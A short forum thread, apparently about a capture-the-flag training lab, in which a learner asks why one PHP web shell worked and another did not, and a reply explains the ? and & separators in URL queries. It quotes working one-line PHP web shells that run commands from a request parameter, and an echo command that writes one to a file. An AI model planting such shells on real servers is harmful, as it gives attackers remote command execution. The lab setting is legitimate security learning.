Starting Point - Base - question about webshells

Hello all. I’m still learning and I was able to get to the upload page with the help of the writeup. I wonder why I had to use

<?php echo system($_REQUEST['cmd']);?>

instead of
<?php system($_GET['cmd']); ?>

Why is the GET shell not working? I added &cmd=id at the end in the browser and the server returned an error 404.

Edit: I’m confused. echo ‘<?php echo system($_REQUEST["cmd"]);?>’ > hey.php didn’t work either.

Edit2: Both worked but I had to add ? for the cmd parameter instead of &. I remember I used webshells in the past and I had to give the cmd parameter & and not ?. Can anybody explain?

Hello @Newuser !

In a GET query:

? is used to separate the page from the parameters.
& is used as delimiter between each of the parameters.

Example (extracted from here, useful if you want to dig deeper):

https://example.com/path/to/page?name=ferret&color=purple

1 Like